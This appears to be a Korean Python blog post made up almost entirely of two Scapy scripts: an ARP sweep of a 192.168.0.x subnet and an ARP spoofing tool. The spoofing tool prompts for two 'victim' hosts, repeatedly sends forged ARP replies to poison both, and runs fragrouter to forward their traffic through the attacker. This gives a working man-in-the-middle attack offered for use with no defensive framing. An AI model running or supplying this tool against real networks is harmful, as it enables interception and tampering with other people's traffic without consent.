<scan.py>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | from scapy.all import * import threading import os host_list = {} num = 0 threadLock = threading.Lock() threads = [] def printHosts(host_list): print('-------------------------- HOST LIST --------------------------') print('NUM IP MAC') print('---------------------------------------------------------------') for num in host_list: ip, mac = host_list[num] print("%d %s %s" % (num, ip, mac)) print('---------------------------------------------------------------') def sendARP(ip): global host_list, num ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip), timeout=5, retry=1) for s, r in ans: threadLock.acquire() num = num + 1 host_list.update({num: (ip, r.sprintf('%Ether.src%'))}) threadLock.release() def scanHosts(): for i in range(1, 256): ip = "192.168.0.%d" % i th = threading.Thread(target=sendARP, args=(ip,)) th.start() threads.append(th) for t in threads: t.join() os.system('clear') printHosts(host_list) return host_list | cs |
<arp_spoofing.py>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | from scan import * from scapy.all import * import os def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac): arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac) arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac) send(arp1) send(arp2) def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac): arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff') arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff') send(arp1, count=3) send(arp2, count=3) def main(): host_list=scanHosts() victim1=input("Victim 1 : ") victim2=input("Victim 2 : ") print("ARP Spoofing START") os.system("fragrouter -B1") try: while True: arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1]) except KeyboardInterrupt: restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1]) print("ARP Spoofing END") if __name__=='__main__': main() | cs |
'Programming > Python' 카테고리의 다른 글
Dictionary Attack (0) | 2020.03.04 |
---|---|
ARP를 이용한 host scan (0) | 2020.02.24 |
ARP Spoofing (0) | 2020.02.24 |
cookie를 이용한 로그인 (0) | 2018.07.18 |
살아있는 호스트 IP 스캔하기 (0) | 2018.02.13 |
1의 보수와 2의 보수 (2) | 2017.01.20 |
댓글0